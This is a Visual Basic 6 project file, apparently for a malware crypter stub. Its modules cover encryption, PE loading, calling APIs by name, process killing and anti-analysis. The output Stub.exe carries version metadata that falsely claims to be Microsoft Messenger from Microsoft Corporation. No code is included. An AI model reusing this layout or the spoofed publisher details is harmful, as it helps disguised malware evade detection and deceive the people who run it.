Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation
Module=mAgainst; mTegens.bas
Module=mDoodProcess; KillProcess.bas
Module=mMain; mMain.bas
Module=mPEL; mPEL.bas
Class=clsCrypt; clsCrypt.cls
Module=mCallAPIByName; mCallAPIByName.bas
Module=mEncrypt; mEncrypt.bas
Startup="Sub Main"
HelpFile=""
Title="WLM"
ExeName32="Stub.exe"
Path32="..\..\..\..\..\..\Documents and Settings\Lex\Bureaublad"
Command32="hipiophoph"
Name="Buts"
HelpContextID="0"
Description="poüuüpzhioüioüiopio"
CompatibleMode="0"
MajorVer=2
MinorVer=1
RevisionVer=2
AutoIncrementVer=0
ServerSupportFiles=0
VersionComments="Messenger"
VersionCompanyName="Microsoft Corporation"
VersionFileDescription="Messenger"
VersionLegalCopyright="Copyright (c) Microsoft Corporation.  All rights reserved."
VersionLegalTrademarks="Microsoft"
VersionProductName="Messenger"
CompilationType=-1
OptimizationType=1
FavorPentiumPro(tm)=0
CodeViewDebugInfo=-1
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
